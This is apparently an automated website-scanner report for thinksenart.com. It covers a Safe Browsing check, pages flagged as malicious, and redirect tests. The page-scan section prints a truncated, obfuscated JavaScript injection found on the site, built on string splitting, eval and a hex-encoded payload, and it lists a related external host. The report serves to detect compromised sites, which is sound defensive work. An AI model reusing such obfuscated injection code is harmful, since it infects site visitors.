Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thinksenart.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thinksenart.com/ | 200 OK Content-Length: 13667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) emnjc="y";ewlrc="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[ewlrc].getElementById("asd"))}()}catch(ehh){jyi=function(zez){zez="fro"+zez;for(xkrl=0;xkrl<emnjc.length;xkrl++){fdo+=String[zez](dnp(wab+(emnjc[xkrl]))-(41));}};};dnp=(window.eval);wab="0x";oio=0;if(!oio){try{++dnp(ewlrc)["bo"+"d"+emnjc]}catch(ehh){vqftim="(";}emnjc="49(8f(9e(97(8c(9d(92(98(97(49(99(93(59(62(51(52(49(a4(36(33(49(9f(8a(9b(49(9c(9d(8a(9d(92(8c(66(50(8a(93(8a(a1(50(64(36(33(49(9f(8a(9b(49 Antivirus reports:
| ||
http://thinksenart.com/js/thinksenart-min.1.1.js | 200 OK Content-Length: 47764 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 Antivirus reports:
| ||
http://penzionusteflu.cz/4cpgb3cr.php?id=1810475 | 404 Not Found Content-Length: 210 Content-Type: text/html | clean |
http://penzionusteflu.cz/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thinksenart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 10:07:33 GMT
Server: Apache
Content-Language: fr
Content-Type: text/html
X-Powered-By: PHP/5.2.5
GET / HTTP/1.1
Host: thinksenart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 10:07:33 GMT
Server: Apache
Content-Language: fr
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Second query (visit from search engine):
GET / HTTP/1.1
Host: thinksenart.com
Referer: http://www.google.com/search?q=thinksenart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thinksenart.com
Referer: http://www.google.com/search?q=thinksenart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.